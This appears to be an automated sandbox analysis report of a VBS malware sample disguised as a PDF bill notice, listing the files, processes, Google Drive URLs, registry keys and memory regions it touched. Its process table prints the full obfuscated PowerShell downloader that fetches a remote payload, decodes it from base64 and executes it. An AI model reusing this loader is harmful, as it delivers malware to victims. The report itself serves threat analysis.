Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
11309-#U96fb#U4fe1#U8cbb#U96fb#U5b50#U901a#U77e5#U55ae#U00b7pdf.vbs
|
ASCII text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ahap3lvc.vc2.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uv2plouf.aj4.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Maskes.lea
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\11309-#U96fb#U4fe1#U8cbb#U96fb#U5b50#U901a#U77e5#U55ae#U00b7pdf.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Ramphastidae Misemphasization Truncal Overvaere Blokdiagram
#>;$Pyroheliometer='Fllesspisninger';<#Reform Palegold Slukningsmaterialerne Udrede Brugsklare Majos Coveys #>;$Grubbers=$host.PrivateData;If
($Grubbers) {$mussack++;}function Shouse($Relativity209){$Unsingability=$Fertilizations+$Relativity209.Length-$mussack;for(
$Iceboats=5;$Iceboats -lt $Unsingability;$Iceboats+=6){$Forstaaelsesproces+=$Relativity209[$Iceboats];}$Forstaaelsesproces;}function
Lnder($Stabl){ . ($Blyantstifter) ($Stabl);}$Nyhedens=Shouse 'ConfeMSkrivoAgg az likfi.heyalTekstlBjlkeaZeugo/Pr he5p lit.Kamer0
ndkr Prel,(FamilW pse iNedf nTipofdCs reoFullywCardosU.gra OvatNA.hilTaudio Frihe1Kirke0Bel,a.Inter0Sho,t;sam,r AdrenWTr
baiAphetnMulig6,ultr4Reser;Films ManifxGnidn6Pro y4Se ic;Recom MusikrelgtyvCredu:Jor.a1 Hopl2Amido1Under.Wilde0H,pop)Ko,ma
WifeGUstyreEntracFlydek dopyoBacks/Misfo2 Fore0Monos1 V go0Rorpi0 pis1Epi i0Vrdi,1resig AcraFLaconiDukkerUgen,e VillfTad
ooHalmlxItc l/Hexac1 rde2trans1Aflas. Omg,0Sca p ';$Ddsfjende=Shouse ',oggeusm apsEntheeOptimR ran-UdbinAJord g FishEWakasn.asuntUpgli
';$Ornaterne=Shouse 'BinrvhFod,atMsinktkla,dppsovisP yll:Koord/ ult/ Fo,sd DisprAs riiScapevSundhe Kims.AcoemgContioResoloThr,ugBi
delrenoreAsers.TyphlcShivaoPoin,m Tryk/AniliuSprogc C.ba?photoeDemolxF ugtpre oloDrukkrStormt,inan=Ye lodKnub oFnaddwsalnanDativl
atioo Besiaacisdd Koll&Eksori nonddMono =Mobil1Per ozLaanej marei eforU Bl,dYCasuiIBesnoFBindeRElfreKSvi.eW atrET ndsmpredeA
Shi,YSpeak5Termo8KatarvBa lopSpild5Indv hNab bWV ils7 pancQTestu3UntemT CleaQIn urzEmaljH eleASusp F Varma SemiWSpint ';$citronsommerfuglens=Shouse
'polit>H rry ';$Blyantstifter=Shouse ' EosiiLaendESoralX.emig ';$Qe='bokset';$Iceboatsnformationskanalerne='\Maskes.lea';Lnder
(Shouse ',ycon$ nlucgOptaglFejlroCoadmbPat iaProsplInnar:Tra,iUmienbnPneumsin.erediabeaRelatsU.aglo Thern a,rya g,nbbI dsplVanafeN
vem= Advo$Var oeWhinsnOrtopvInko :sk smaPrea pS andpD skrd V.isaStivstC anga aagn+Afs u$ Enc.Ih,uchcEilaieAllodbKultuo Ti.faAcleit
ambssAtl nnKuwaifSuperoRangsrPapism Stifa And tAk iviCh omoJagthnAnsk,sEpiklkRapteaRubatnFerleaUdkanl Ideee NitrrbrutanUnclieBo,ep
');Lnder (Shouse ' Spre$T rtigR daklFrifio Hjerb P riaUnim lFling:NytnkPkontor O.enoF ededre raunontakrigsbtStegei nchaoOblignMyrmesEspiesrubefyUdlovsPur
otTropeeFingimU ati= Some$ OpmaO PalmrAutomn ForbaPuzzltF rskeInh mr .echnNon heCytop.N.opls sladp F ltl logmiGrnsktNring(Knag
$ Unsyc,landiTeleft hoorr AfdeolifebnP isisInteroKomplmSt ukmFl,trekadetr Dionf B.lyuIntergForn,lHepateUndernP.ncrsUnbaf)
kytt ');Lnder (Shouse 'Dtu.k[DilatN TurteJordbt.hizo.B bliSBegruer.porrC risvDeteriIndvecMatereAcreaPSyen oBrn.tiExternBa.ret
VideMKoralaAncomnForuda Bemag F.oreg,lacrBudbr]Lengt:Acco,:BlunkSLavspeMika c ThrouOkku,rT.bloiAvisbtM croySpiliP KragrReseroBannetI
hosoBlomscje,nbo Rec,lA.loi Dompr=gumb Livs[Uns lNLoculeArbejtCo ym.superSVirile.nemocTyngdusem nrEfteriUsmidtArneryTilliPApinarUpperoumpirt
Shmuo OutfcHjrneo C.lilPasseTergatyUnsulp Pre e Mori]Sorre:Sac,h:Ma diTStormlRengrsSeert1Novem2Pre n ');$Ornaterne=$Produktionssystem[0];$Repertoirer248=(Shouse
' Sp e$KultugDist lSlageoBorepb.evanAlucenLR kla: BasuTNonphITransl SolsTIri,iv IndaIHovednGalatG RejseFossel Wisss MarceGuaryS
Fred=MyeloNStaale E,skwRatio-Opvi oAbs lbfor,yjUdaa,e iljicStumpTAste, MinirS Scu YBoar S PlestPeriveKolonM Parl. CellN achE
Ii lt Udb . ShraWF.rurEDeploBOpstiCBe.neLoutmaiOm,rseNikkeNBlindT Tilb ');Lnder ($Repertoirer248);Lnder (Shouse 'Elseb$ KoepTPru
siAnnivlAwin,tSupervLandii OvovnSuspeg Retue oundlInsw sSt aneInfras.edin.GrandHOpt geFemina nfod SteieOutc rlcdfrsUtopi[Ba.wi$SelekDSalindLimnosInt
rfDeta j ArileHazinnlapardAntite A th]Kikse= impu$Ind,oNAutomy D.ochKartoeFum ldPanhee anken finnsBaul ');$Undskyldeligstes=Shouse
'S ill$RepubT ultai gal lFolintKlappvTidssiAerofn Cs.rg IndueTr.erlPlurisDokt eVkstcsLeaka.Esp uD glyco ResswStandnUrohelSoegeoSkr,ta
VessdNito.F afb,iMamm lTroskeMortg( hrom$BeskrOwh,llr Blinn.bstraUntratRidine Sm kr RussnP,raseUmaad, Bleg$BackbIGinninT.nnivStubmeAndorc
Slvetbremsi.krtovG anti SkatsTriggtBioph)flera ';$Invectivist=$Unseasonable;Lnder (Shouse 'Seede$ ConfGfor,ilSovevoSljedBSbeskA
onlalBestv:Nige cs.henHUghteUUten rLesskrProg =Playg(Strgnt An se Dives eaphtThurt-Kvot.pObstiAM,trotRostrhDjebe .aes$Lu
eriSynknn J levKalkuEKejseC.nameTMuleniStemmvAnhimiPlainsDdsofTprocu)Endoc ');while (!$Churr) {Lnder (Shouse 'Foran$Fjan.gMaschl
orsioC ntrbStt eaUvi el.ontu: ejslGAnerkaAttatm caphe.llocnPragtsSlvho=Trump$ReklatS.ripr Ep iuBurgle Meta ') ;Lnder $Undskyldeligstes;Lnder
(Shouse 'Smd nSDiesetAlmueaFortrrPen atBeskf-Rs wsS Jordl Tante Fabre Unprp Avan Slimi4Conqu ');Lnder (Shouse ' Best$estrag
SlvslSam io RefobArvemaA.onilHomog:djagoCSpa.shp epeuPolitrIsep,rS eri=Enlar( confTAne reAdfrdsimdektVandr- AdvaPLigesamemb
tPrepehN tar If,di$PettiI Overn AutovDefoleTospac,essitM treiumrkevTjre.iAprops Billt,mbro)Disco ') ;Lnder (Shouse ' Glov$Urbang
ortilnonveoGrimlb,aggaaPortulSpise:G ninIAntiln A cisP.romeVestvc LavpuExactrCorroiBillatUnd rySlart=u,cov$FiltrgSpreelAabeno,ratcb
Ar iaGlistlOmst.:UnproLThorviAsylusOvalitLeu,oehertufEfterrXeropiO elunTan sg.fter+Bjlke+Laser% Nenn$Rok rPluxatrHeadlobademdImpreu
LestkDa lit Tempi laahodrilln Ap rsMistrsRidseyKeisasguzemtDes.aeContrmPlate.Ma necSttteoCombuuGrisenphonotSucce ') ;$Ornaterne=$Produktionssystem[$Insecurity];}$Genistreger7=322791;$Iceboatsssalat=31553;Lnder
(Shouse 'Harpe$ KnetgSecunl F,ero FyrbbPhantaMyosulFornr:HaandN MitueSpanddKrum fbestrlHai,md Er meSkurpl,ussiiBundfgUnsty7
Pont2,hikk Hoved=Tec n IntrGErkeneB.ndotSejer-,taffCBv,ruo SprrnTopv t Pharetekn nFe eltHemit Jrpek$ kneIDemagnS egevAntepePleoncForfotNabofi
Ung.vCh fii ConssSe artZo,st ');Lnder (Shouse 'Appet$Tv ngg hakilSymasoAcierbMoralaparbalTopog:Rej rI Kordn pfiedClipprOuthiiKkkenmRivie
Hj a=sympt Suged[Eft,rSPaasmyKolk.sUnplotC.rpoeAdinamTrack. F emCDauntoheretnPusilv ,deneTestir basst N nm] R ad: uppl:KakaoFTedesrLinchoPhonomElimiB
ragia arcisKonsoe.chro6Toldb4Skam SKbsvatMystirKvadriTndstn AbsogPlaty(Telev$ Cyc,NSemiceUnderddriftf SvmmlBrevfdGym,ieTresil
Rou iKeglegFrygt7C iro2Uropf) Z og ');Lnder (Shouse 'De re$Boobrg ettylVdenvoGoffeb R ina RevolNo,co:Wlec.APole nBringk Trree
AmmorEnep pGrothlHuggpaSquasdPatrosLondreRekylrSnekan IsseeBodsv1Lip m1 dekr0Bundl psig=Kart, Ush k[PlicaSLjtnay Da ks TruttSolice
veramSlat,. D.miT TimeeStu dxForsutSkral.a idnEUpernnWallpc Sammo Qui.dStyrii Pr.snhidegga.els]Genbr: Whim:JamaiAUn giSElm
sCUdfreIInd.jIZambo.ReproGSysteeAmatrt CiviS Eg ltCyanirProgriBurmanVaticgDu li(Bevis$OrdinI dsaanN nepdQuindrSo,asiSte lmUnwre)Reins
');Lnder (Shouse 'H.ali$subvegdobbel.ereaoUnde,bH ppeaSkr mlSubwa: CervRMiljsiPi cogL,ngeh,ndlet SekslPlurae KartsLaundsTitmanEk
poepsyc.sBagnesT,kke= S lv$Symp,ARatton AfmakCarnie vaudrOmgivpSelvmlQ aubaP rlodAftrksVauxheM sunrstenonAnth eB tte1Rytte1
ulti0Cadav. Sk.asOsteouLovlibSamkrs ountUnderrCentri StilnTitulgUtopi(Skjer$ OrdeGopspaeW,ltonRugekiMiliesp ocetExcerrRounjeNoningcun
ie ConvrTands7somal,Fast $AbdicI,rovrc I daeVenosbSto moGaeldaKi hbtSta ksVaages Erass Couna udhul G,ltaInvectSamme)Corkb
');Lnder $Rightlessness;"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://www.google.com
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://drive.usercontent.google.com
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
http://pesterbdd.com/images/Pe
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://drive.googP
|
unknown
|
||
|
https://drive.google.com
|
unknown
|
||
|
https://drive.usercontent.googh
|
unknown
|
||
|
https://drive.usercontent.google.com
|
unknown
|
||
|
http://drive.google.com
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://apis.google.com
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
There are 10 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
drive.google.com
|
142.250.185.206
|
||
|
drive.usercontent.google.com
|
216.58.206.65
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
142.250.185.206
|
drive.google.com
|
United States
|
||
|
216.58.206.65
|
drive.usercontent.google.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
1D3D41D2000
|
trusted library allocation
|
page read and write
|
|
|
|
1D3C47A3000
|
trusted library allocation
|
page read and write
|
||
|
1D3C4161000
|
trusted library allocation
|
page read and write
|
||
|
1B80156C000
|
heap
|
page read and write
|
||
|
1D3C3E30000
|
heap
|
page readonly
|
||
|
1B801576000
|
heap
|
page read and write
|
||
|
1B8033D5000
|
heap
|
page read and write
|
||
|
7FF7C0B7D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF7C0C90000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D3DC5A0000
|
heap
|
page read and write
|
||
|
B04B877000
|
stack
|
page read and write
|
||
|
7FF7C0DF0000
|
trusted library allocation
|
page read and write
|
||
|
1B801585000
|
heap
|
page read and write
|
||
|
1B801490000
|
heap
|
page read and write
|
||
|
8F9E5FE000
|
stack
|
page read and write
|
||
|
7FF7C0E70000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0EB0000
|
trusted library allocation
|
page read and write
|
||
|
1D3C45E2000
|
trusted library allocation
|
page read and write
|
||
|
1B8033C8000
|
heap
|
page read and write
|
||
|
1D3C5DCE000
|
trusted library allocation
|
page read and write
|
||
|
1D3C3E10000
|
trusted library allocation
|
page read and write
|
||
|
1B803286000
|
heap
|
page read and write
|
||
|
B04BB7E000
|
stack
|
page read and write
|
||
|
1D3DC6C4000
|
heap
|
page read and write
|
||
|
7FF7C0D30000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF7C0DE0000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0DB0000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0C56000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B8012C0000
|
heap
|
page read and write
|
||
|
1B801588000
|
heap
|
page read and write
|
||
|
1D3DC5A2000
|
heap
|
page read and write
|
||
|
1D3C4387000
|
trusted library allocation
|
page read and write
|
||
|
1B80157E000
|
heap
|
page read and write
|
||
|
1B80329E000
|
heap
|
page read and write
|
||
|
1B8016A5000
|
heap
|
page read and write
|
||
|
1D3C6033000
|
trusted library allocation
|
page read and write
|
||
|
1B803293000
|
heap
|
page read and write
|
||
|
1D3C4BCB000
|
trusted library allocation
|
page read and write
|
||
|
1B80155D000
|
heap
|
page read and write
|
||
|
1D3C2595000
|
heap
|
page read and write
|
||
|
1B801563000
|
heap
|
page read and write
|
||
|
1D3DC68A000
|
heap
|
page read and write
|
||
|
1D3C25DD000
|
heap
|
page read and write
|
||
|
1B8013C0000
|
heap
|
page read and write
|
||
|
1D3C23C0000
|
heap
|
page read and write
|
||
|
1D3C2510000
|
heap
|
page read and write
|
||
|
1B80156F000
|
heap
|
page read and write
|
||
|
7FF7C0D10000
|
trusted library allocation
|
page read and write
|
||
|
1B8032B6000
|
heap
|
page read and write
|
||
|
7FF7C0EF0000
|
trusted library allocation
|
page read and write
|
||
|
1B8014B8000
|
heap
|
page read and write
|
||
|
B04B18E000
|
stack
|
page read and write
|
||
|
7FF7C0B74000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0D52000
|
trusted library allocation
|
page read and write
|
||
|
1B8033A3000
|
heap
|
page read and write
|
||
|
B04B9FE000
|
stack
|
page read and write
|
||
|
1D3C24C0000
|
heap
|
page read and write
|
||
|
1B8033B2000
|
heap
|
page read and write
|
||
|
1B803396000
|
heap
|
page read and write
|
||
|
1D3C25B5000
|
heap
|
page read and write
|
||
|
1D3D4161000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0D60000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B80155D000
|
heap
|
page read and write
|
||
|
7FF7C0EE0000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0E50000
|
trusted library allocation
|
page read and write
|
||
|
1B80158B000
|
heap
|
page read and write
|
||
|
1D3DC590000
|
heap
|
page execute and read and write
|
||
|
7FF7C0B8B000
|
trusted library allocation
|
page read and write
|
||
|
1D3DC660000
|
heap
|
page read and write
|
||
|
1D3C3F81000
|
heap
|
page read and write
|
||
|
B04BBFB000
|
stack
|
page read and write
|
||
|
1B803380000
|
heap
|
page read and write
|
||
|
1D3DC6A0000
|
heap
|
page read and write
|
||
|
1B80155F000
|
heap
|
page read and write
|
||
|
1B8014BA000
|
heap
|
page read and write
|
||
|
B04B5FC000
|
stack
|
page read and write
|
||
|
B04B978000
|
stack
|
page read and write
|
||
|
1B8014BE000
|
heap
|
page read and write
|
||
|
7FF7C0B80000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0BCC000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF7C0E60000
|
trusted library allocation
|
page read and write
|
||
|
1B8032E8000
|
heap
|
page read and write
|
||
|
1B801498000
|
heap
|
page read and write
|
||
|
1D3C3E25000
|
heap
|
page read and write
|
||
|
1B803290000
|
heap
|
page read and write
|
||
|
1B8032A7000
|
heap
|
page read and write
|
||
|
B04B1CF000
|
stack
|
page read and write
|
||
|
7FF7C0DD0000
|
trusted library allocation
|
page read and write
|
||
|
1D3D445B000
|
trusted library allocation
|
page read and write
|
||
|
1D3C4605000
|
trusted library allocation
|
page read and write
|
||
|
1D3DC814000
|
heap
|
page read and write
|
||
|
1D3D4170000
|
trusted library allocation
|
page read and write
|
||
|
1B8016A0000
|
heap
|
page read and write
|
||
|
1D3DC597000
|
heap
|
page execute and read and write
|
||
|
1B8014FE000
|
heap
|
page read and write
|
||
|
1B803281000
|
heap
|
page read and write
|
||
|
1D3C5DE1000
|
trusted library allocation
|
page read and write
|
||
|
1B801576000
|
heap
|
page read and write
|
||
|
8F9ECFE000
|
stack
|
page read and write
|
||
|
1D3DC7CA000
|
heap
|
page read and write
|
||
|
B04BA7E000
|
stack
|
page read and write
|
||
|
1B8014F2000
|
heap
|
page read and write
|
||
|
1D3C25E3000
|
heap
|
page read and write
|
||
|
1D3DC7A0000
|
heap
|
page read and write
|
||
|
B04B103000
|
stack
|
page read and write
|
||
|
1D3C4658000
|
trusted library allocation
|
page read and write
|
||
|
1B80328B000
|
heap
|
page read and write
|
||
|
B04B8F9000
|
stack
|
page read and write
|
||
|
1B8033B2000
|
heap
|
page read and write
|
||
|
1B8014F2000
|
heap
|
page read and write
|
||
|
1D3DC899000
|
heap
|
page read and write
|
||
|
1D3C3E40000
|
trusted library allocation
|
page read and write
|
||
|
1D3C3E20000
|
heap
|
page read and write
|
||
|
7FF7C0B70000
|
trusted library allocation
|
page read and write
|
||
|
1D3C5E4B000
|
trusted library allocation
|
page read and write
|
||
|
1D3C48B2000
|
trusted library allocation
|
page read and write
|
||
|
1B8033C4000
|
heap
|
page read and write
|
||
|
8F9EBFE000
|
stack
|
page read and write
|
||
|
1D3C5DB7000
|
trusted library allocation
|
page read and write
|
||
|
1B8014CE000
|
heap
|
page read and write
|
||
|
1B801577000
|
heap
|
page read and write
|
||
|
1B80329B000
|
heap
|
page read and write
|
||
|
1D3C24A0000
|
heap
|
page read and write
|
||
|
1D3C5DF4000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0D90000
|
trusted library allocation
|
page read and write
|
||
|
8F9E1AA000
|
stack
|
page read and write
|
||
|
1B803292000
|
heap
|
page read and write
|
||
|
1D3C5E0E000
|
trusted library allocation
|
page read and write
|
||
|
1D3C4B72000
|
trusted library allocation
|
page read and write
|
||
|
1D3D444C000
|
trusted library allocation
|
page read and write
|
||
|
1D3C4150000
|
heap
|
page execute and read and write
|
||
|
1B8014BF000
|
heap
|
page read and write
|
||
|
1D3C2515000
|
heap
|
page read and write
|
||
|
1D3DC610000
|
heap
|
page read and write
|
||
|
1B8014BB000
|
heap
|
page read and write
|
||
|
7FF7C0E10000
|
trusted library allocation
|
page read and write
|
||
|
1B801580000
|
heap
|
page read and write
|
||
|
1B803280000
|
heap
|
page read and write
|
||
|
1B80157A000
|
heap
|
page read and write
|
||
|
1D3DC840000
|
heap
|
page read and write
|
||
|
8F9E7FF000
|
stack
|
page read and write
|
||
|
7FF7C0C20000
|
trusted library allocation
|
page read and write
|
||
|
1B801565000
|
heap
|
page read and write
|
||
|
1B8032B6000
|
heap
|
page read and write
|
||
|
1D3C465C000
|
trusted library allocation
|
page read and write
|
||
|
B04B7FE000
|
stack
|
page read and write
|
||
|
1D3C45F1000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0C26000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0C2C000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D3DC806000
|
heap
|
page read and write
|
||
|
1D3C3F7A000
|
heap
|
page read and write
|
||
|
1D3DC66B000
|
heap
|
page read and write
|
||
|
1D3C461A000
|
trusted library allocation
|
page read and write
|
||
|
1B801563000
|
heap
|
page read and write
|
||
|
1D3C45F5000
|
trusted library allocation
|
page read and write
|
||
|
1B8032B6000
|
heap
|
page read and write
|
||
|
1D3C55DB000
|
trusted library allocation
|
page read and write
|
||
|
1B8032AA000
|
heap
|
page read and write
|
||
|
1B80155D000
|
heap
|
page read and write
|
||
|
1B8014F2000
|
heap
|
page read and write
|
||
|
1B8033D5000
|
heap
|
page read and write
|
||
|
1B803396000
|
heap
|
page read and write
|
||
|
1B8014B9000
|
heap
|
page read and write
|
||
|
1D3C3DF0000
|
trusted library allocation
|
page read and write
|
||
|
1B803284000
|
heap
|
page read and write
|
||
|
1D3DC5C1000
|
heap
|
page read and write
|
||
|
1B8032B6000
|
heap
|
page read and write
|
||
|
1D3C5EB3000
|
trusted library allocation
|
page read and write
|
||
|
1B80156C000
|
heap
|
page read and write
|
||
|
7FF7C0EC0000
|
trusted library allocation
|
page read and write
|
||
|
1D3C480F000
|
trusted library allocation
|
page read and write
|
||
|
1D3C259B000
|
heap
|
page read and write
|
||
|
1D3D4181000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0B72000
|
trusted library allocation
|
page read and write
|
||
|
1D3C45D9000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0E30000
|
trusted library allocation
|
page read and write
|
||
|
1D3DC500000
|
heap
|
page read and write
|
||
|
7FF7C0B73000
|
trusted library allocation
|
page execute and read and write
|
||
|
B04B7F8000
|
stack
|
page read and write
|
||
|
1B8033A6000
|
heap
|
page read and write
|
||
|
7FF7C0E40000
|
trusted library allocation
|
page read and write
|
||
|
1D3DC7F3000
|
heap
|
page read and write
|
||
|
B04B4FE000
|
stack
|
page read and write
|
||
|
1D3C2520000
|
heap
|
page read and write
|
||
|
1D3DC6C1000
|
heap
|
page read and write
|
||
|
1B801578000
|
heap
|
page read and write
|
||
|
B04B67E000
|
stack
|
page read and write
|
||
|
1B80155D000
|
heap
|
page read and write
|
||
|
1B803292000
|
heap
|
page read and write
|
||
|
1D3C5DD9000
|
trusted library allocation
|
page read and write
|
||
|
1D3C3E70000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0E80000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0D70000
|
trusted library allocation
|
page read and write
|
||
|
1B8032B6000
|
heap
|
page read and write
|
||
|
1B8013A0000
|
heap
|
page read and write
|
||
|
7FF7C0E00000
|
trusted library allocation
|
page read and write
|
||
|
B04B47F000
|
stack
|
page read and write
|
||
|
7FF7C0D2A000
|
trusted library allocation
|
page read and write
|
||
|
1B8032E8000
|
heap
|
page read and write
|
||
|
1B8033CE000
|
heap
|
page read and write
|
||
|
1D3DCB20000
|
heap
|
page read and write
|
||
|
7FF7C0E90000
|
trusted library allocation
|
page read and write
|
||
|
B04C64D000
|
stack
|
page read and write
|
||
|
8F9EEFB000
|
stack
|
page read and write
|
||
|
8F9EAFD000
|
stack
|
page read and write
|
||
|
1D3C2599000
|
heap
|
page read and write
|
||
|
1D3DC872000
|
heap
|
page read and write
|
||
|
1B8033DB000
|
heap
|
page read and write
|
||
|
8F9E8FE000
|
stack
|
page read and write
|
||
|
1D3C4110000
|
heap
|
page execute and read and write
|
||
|
1B801522000
|
heap
|
page read and write
|
||
|
7FF7C0DC0000
|
trusted library allocation
|
page read and write
|
||
|
1D3C5970000
|
trusted library allocation
|
page read and write
|
||
|
1D3C5F64000
|
trusted library allocation
|
page read and write
|
||
|
1D3C5E63000
|
trusted library allocation
|
page read and write
|
||
|
1D3C45ED000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0D80000
|
trusted library allocation
|
page read and write
|
||
|
1B803383000
|
heap
|
page read and write
|
||
|
1B801660000
|
heap
|
page read and write
|
||
|
1D3C4BDB000
|
trusted library allocation
|
page read and write
|
||
|
1B8032B6000
|
heap
|
page read and write
|
||
|
8F9EDFE000
|
stack
|
page read and write
|
||
|
7FF7C0B90000
|
trusted library allocation
|
page read and write
|
||
|
1B8032E8000
|
heap
|
page read and write
|
||
|
1D3C25A3000
|
heap
|
page read and write
|
||
|
7FF7C0D40000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF7C0D21000
|
trusted library allocation
|
page read and write
|
||
|
1B8033C7000
|
heap
|
page read and write
|
||
|
7FF7C0E20000
|
trusted library allocation
|
page read and write
|
||
|
1B803382000
|
heap
|
page read and write
|
||
|
1B803288000
|
heap
|
page read and write
|
||
|
1D3C41E6000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0EA0000
|
trusted library allocation
|
page read and write
|
||
|
B04C5CE000
|
stack
|
page read and write
|
||
|
1D3C2550000
|
heap
|
page read and write
|
||
|
7FF7C0ED0000
|
trusted library allocation
|
page read and write
|
||
|
B04B57F000
|
stack
|
page read and write
|
||
|
1D3C459B000
|
trusted library allocation
|
page read and write
|
||
|
7DF4AC140000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF7C0DA0000
|
trusted library allocation
|
page read and write
|
||
|
1D3C5E4F000
|
trusted library allocation
|
page read and write
|
||
|
B04BAFF000
|
stack
|
page read and write
|
||
|
1D3C3F70000
|
heap
|
page read and write
|
||
|
1D3C3EB0000
|
trusted library allocation
|
page read and write
|
||
|
1D3C4806000
|
trusted library allocation
|
page read and write
|
||
|
1D3C5DBA000
|
trusted library allocation
|
page read and write
|
||
|
1B803293000
|
heap
|
page read and write
|
||
|
8F9E4FE000
|
stack
|
page read and write
|
||
|
B04B6FE000
|
stack
|
page read and write
|
||
|
1B8014B9000
|
heap
|
page read and write
|
||
|
B04B77E000
|
stack
|
page read and write
|
||
|
1D3C5DDD000
|
trusted library allocation
|
page read and write
|
There are 242 hidden memdumps, click here to show them.